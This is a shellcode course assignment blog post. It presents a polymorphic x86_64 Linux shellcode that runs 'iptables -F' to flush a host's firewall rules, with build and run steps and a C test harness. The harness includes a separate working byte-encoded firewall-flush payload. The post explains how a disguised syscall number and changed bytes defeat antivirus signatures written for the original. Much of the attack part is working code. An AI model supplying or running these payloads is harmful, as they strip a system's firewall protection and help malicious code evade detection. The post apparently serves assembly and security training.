This blog post has been created for completing the requirements of the SecurityTube Linux Assembly Expert certification.
http://securitytube-training.com/online-courses/securitytube-linux-assembly-expert/
Student ID: SLAE64-1434
Target Operating System: 64 bit Linux (x86_64 GNU/Linux)
This blog post is part of Assignment 6: http://a41l4.blogspot.ca/2017/03/assignment-6.html
The Original Version: http://shell-storm.org/shellcode/files/shellcode-683.php
Original size: 50 bytes (don't believe what he says :)
My Version:
GitHub Link: https://github.com/rtaylor777/nasm/blob/master/PolyFlushIPTables1434.nasm
Published: https://www.exploit-db.com/exploits/41503/
My version:
Number of bytes = 47
Number of nulls = 0
PolyFlushIPTables1434.nasm
Intro
This shellcode simply executes /sbin/iptables -F with no other parameters. From man iptables:
"-F, --flush [chain]
Flush the selected chain (all the chains in the table if none is given). This is equivalent to deleting all the rules one by one."
Polymorphic
Besides fixing some issues with the original shellcode (fixes which would have increased its size), I rewrote the code to bring it down to 43 bytes. Then I worked on obscuring what is happening, which brought the size back up to 47 bytes.
If you look up system call number 82:
This can be found in /usr/include/x86_64-linux-gnu/asm/unistd_64.h on my system, where 82 is __NR_rename (execve is 59).
82 is clearly not the correct system call value for execve. The bit of math on lines 41 and 42 of the NASM source is what converts the value in AL to the correct number for the execve call, so the usual mov al, 59 is not there for a signature to key on.
Overall this produces bytecode with a different signature from the original, so a signature written for the original's bytes would not match it.
Testing
Download:
wget https://raw.githubusercontent.com/rtaylor777/nasm/master/PolyFlushIPTables1434.nasm
Assuming you have the NASM assembler ( http://www.nasm.us/ ):
Assemble:
nasm -felf64 PolyFlushIPTables1434.nasm -o PolyFlushIPTables1434.o
Link:
ld PolyFlushIPTables1434.o -o PolyFlushIPTables1434
Execute:
./PolyFlushIPTables1434
The PolyFlushIPTables1434 shellcode.c
If you missed it from my previous blog posts the shellcode.c file is auto generated by my helper scripts. See: http://a41l4.blogspot.ca/2017/02/slae-helper-scripts.html
Sample of running the resulting shellcode executable:
The Original
The Original Shellcode
Original.c
You will notice that even though the original author claimed his shellcode was 49 bytes, he actually somehow missed an essential byte, push bx, which would have pushed the second half of his string onto the stack. So I resorted to copying his assembler source and building the shellcode from that.
When tested with my usual practice of polluting the registers with 0xffffffffffffffff before calling the shellcode, his shellcode segfaulted. This is because the author did not zero RDX (execve's envp argument): with RDX still 0xffffffffffffffff, execve gets an invalid envp pointer, fails with EFAULT, and execution falls through past the syscall into whatever bytes follow. Zeroing RDX would have increased the size of his code by at least 1 more byte, for an actual size of 51 bytes.
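The following harness is an added example, not code from the post or from either shellcode's author. It implements the two checks discussed on this page: the register-pollution test (every general-purpose register except rsp/rbp preset to 0xffffffffffffffff before control reaches the payload) and the trick of decoding the syscall number in AL at run time instead of writing the real number into the bytes. The three small payloads are constructed for the example and end in sys_exit, so the outcome shows up in the child's exit status: a payload that assumes clean registers crashes, one that zeroes rax but not rdi exits with a wrong status (the same class of bug as the unzeroed RDX above), and the hardened one behaves the same either way. SC_FLUSH is my own 52-byte execve("//sbin//iptables", ["//sbin//iptables","-F"], NULL) variant written for this example, not the post's 47-byte PolyFlushIPTables1434; the harness checks it for null bytes but never executes it, since as root it really would flush the filter table.

```c
/* Added harness: run a shellcode blob in a forked child with every general-purpose
 * register preset to `fill` (0 = clean, UINT64_MAX = polluted as in the post), and
 * report how the child ended.  x86_64 Linux only; payloads are constructed here. */
#define _GNU_SOURCE
#include <stdint.h>
#include <stdio.h>
#include <string.h>
#include <unistd.h>
#include <sys/mman.h>
#include <sys/wait.h>

enum { RESULT_UNSUPPORTED = -1, RESULT_SIGNALED = -2 };

/* Toy payloads: each ends in sys_exit, so the result is visible in the exit status. */
static const uint8_t SC_NAIVE[] = {                 /* assumes rax and rdi arrive as zero */
    0xB0, 0x3C, 0x0F, 0x05 };                       /* mov al, 60 ; syscall  -> exit(rdi) */
static const uint8_t SC_PARTIAL[] = {               /* zeroes rax, forgets rdi (cf. the unzeroed RDX) */
    0x31, 0xC0, 0xB0, 0x3C, 0x0F, 0x05 };           /* xor eax, eax ; mov al, 60 ; syscall */
static const uint8_t SC_HARDENED[] = {              /* zeroes what it uses, hides the syscall number */
    0x31, 0xC0, 0x31, 0xFF,                         /* xor eax, eax ; xor edi, edi */
    0xB0, 0x52, 0x2C, 0x16, 0x0F, 0x05 };           /* mov al, 82 ; sub al, 22 (=60) ; syscall */

/* My own execve("//sbin//iptables", {"//sbin//iptables", "-F", NULL}, NULL): 52 bytes,
 * no nulls, rdx zeroed, 82-23 = 59 (execve) decoded in AL.  Data only: the harness
 * never runs it, because as root it really would flush the filter table. */
static const uint8_t SC_FLUSH[] = {
    0x31, 0xC0, 0x50,                                                   /* xor eax, eax ; push rax */
    0x48, 0xBB, 0x69, 0x70, 0x74, 0x61, 0x62, 0x6C, 0x65, 0x73, 0x53,   /* mov rbx, "iptables" ; push rbx */
    0x48, 0xBB, 0x2F, 0x2F, 0x73, 0x62, 0x69, 0x6E, 0x2F, 0x2F, 0x53,   /* mov rbx, "//sbin//" ; push rbx */
    0x48, 0x89, 0xE7,                                                   /* mov rdi, rsp            (path) */
    0x50, 0x66, 0xC7, 0x04, 0x24, 0x2D, 0x46,                           /* push rax ; mov word [rsp], "-F" */
    0x48, 0x89, 0xE3,                                                   /* mov rbx, rsp            ("-F") */
    0x50, 0x53, 0x57,                                                   /* push rax ; push rbx ; push rdi */
    0x48, 0x89, 0xE6,                                                   /* mov rsi, rsp            (argv) */
    0x31, 0xD2,                                                         /* xor edx, edx     (envp = NULL) */
    0xB0, 0x52, 0x2C, 0x17, 0x0F, 0x05 };                               /* mov al, 82 ; sub al, 23 ; syscall */

/* 1 if the blob contains a 0x00 byte (it would be truncated by a string copy), else 0. */
int has_null_byte(const uint8_t *code, size_t len) {
    for (size_t i = 0; i < len; i++)
        if (code[i] == 0) return 1;
    return 0;
}

#if defined(__x86_64__) && defined(__linux__)
/* Set rax, rbx, rcx, rdx, rsi, rdi, r8-r15 to `fill` (rsp/rbp untouched) and jump to
 * `sc` through a stack slot, so no register has to stay clean to hold the target. */
static void __attribute__((noreturn)) jump_with_regs(const void *sc, uint64_t fill) {
    __asm__ volatile(
        "push %0\n\t" "mov %1, %%rax\n\t"
        "mov %%rax, %%rbx\n\t" "mov %%rax, %%rcx\n\t" "mov %%rax, %%rdx\n\t"
        "mov %%rax, %%rsi\n\t" "mov %%rax, %%rdi\n\t" "mov %%rax, %%r8\n\t"
        "mov %%rax, %%r9\n\t"  "mov %%rax, %%r10\n\t" "mov %%rax, %%r11\n\t"
        "mov %%rax, %%r12\n\t" "mov %%rax, %%r13\n\t" "mov %%rax, %%r14\n\t"
        "mov %%rax, %%r15\n\t" "jmp *(%%rsp)\n\t"
        : : "r"(sc), "r"(fill) : "memory");
    __builtin_unreachable();
}
#endif

/* Returns the child's exit status (0..255), RESULT_SIGNALED if the payload crashed,
 * or RESULT_UNSUPPORTED if this host cannot map and run x86_64 code. */
int run_shellcode(const uint8_t *code, size_t len, uint64_t fill) {
#if defined(__x86_64__) && defined(__linux__)
    size_t sz = (size_t)sysconf(_SC_PAGESIZE);
    if (len > sz) return RESULT_UNSUPPORTED;
    void *mem = mmap(NULL, sz, PROT_READ | PROT_WRITE, MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
    if (mem == MAP_FAILED) return RESULT_UNSUPPORTED;
    memcpy(mem, code, len);                              /* rest of the page stays 0x00 */
    if (mprotect(mem, sz, PROT_READ | PROT_EXEC) != 0) { munmap(mem, sz); return RESULT_UNSUPPORTED; }
    int status = 0;
    pid_t pid = fork();
    if (pid == 0) jump_with_regs(mem, fill);             /* child: exits or crashes in the payload */
    int ok = pid > 0 && waitpid(pid, &status, 0) == pid;
    munmap(mem, sz);
    if (!ok) return RESULT_UNSUPPORTED;
    if (WIFEXITED(status)) return WEXITSTATUS(status);
    return WIFSIGNALED(status) ? RESULT_SIGNALED : RESULT_UNSUPPORTED;
#else
    (void)code; (void)len; (void)fill;
    return RESULT_UNSUPPORTED;
#endif
}

int main(void) {
    struct { const char *name; const uint8_t *sc; size_t len; } t[] = {
        { "naive", SC_NAIVE, sizeof SC_NAIVE }, { "partial", SC_PARTIAL, sizeof SC_PARTIAL },
        { "hardened", SC_HARDENED, sizeof SC_HARDENED } };
    for (size_t i = 0; i < sizeof t / sizeof t[0]; i++)     /* on x86_64: 0/-2, 0/255, 0/0 */
        printf("%-8s clean=%d polluted=%d\n", t[i].name,
               run_shellcode(t[i].sc, t[i].len, 0), run_shellcode(t[i].sc, t[i].len, UINT64_MAX));
    printf("flush payload: %zu bytes, contains null: %d\n", sizeof SC_FLUSH, has_null_byte(SC_FLUSH, sizeof SC_FLUSH));
    return 0;
}
```

The naive payload works only when rax and rdi happen to be zero; with every register set to 0xffffffffffffffff its `mov al, 60` yields a bogus syscall number, the kernel returns -ENOSYS, and execution runs off the end into the zero-filled page and segfaults, which is the same failure pattern as the unzeroed RDX in the original flush shellcode. The partial payload does not crash but exits with status 255 instead of 0, the quieter kind of bug that a clean-register test never shows. Build with gcc on an x86_64 Linux box; on other hosts every run reports RESULT_UNSUPPORTED rather than guessing.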
Summary
PolyFlushIPTables1434 shellcode runs /sbin/iptables -F, which flushes every chain in the filter table (the default table when no -t is given) on the host where it executes; chain policies and the other tables are left as they are. Of course, iptables needs root (CAP_NET_ADMIN), so the shellcode would have to be injected into a process running with that privilege. Additionally, this version is polymorphic in that the code is harder to follow and its bytecode is very different from the original's, so a signature built from the original would not match it in malware detection software. This version is also 3 to 4 bytes smaller than the original, depending on whether you count the original as published or with its bugs fixed.
If you wish to learn more about assembly language, I highly recommend the SecurityTube Linux Assembly Expert course and certification:
http://securitytube-training.com/online-courses/securitytube-linux-assembly-expert/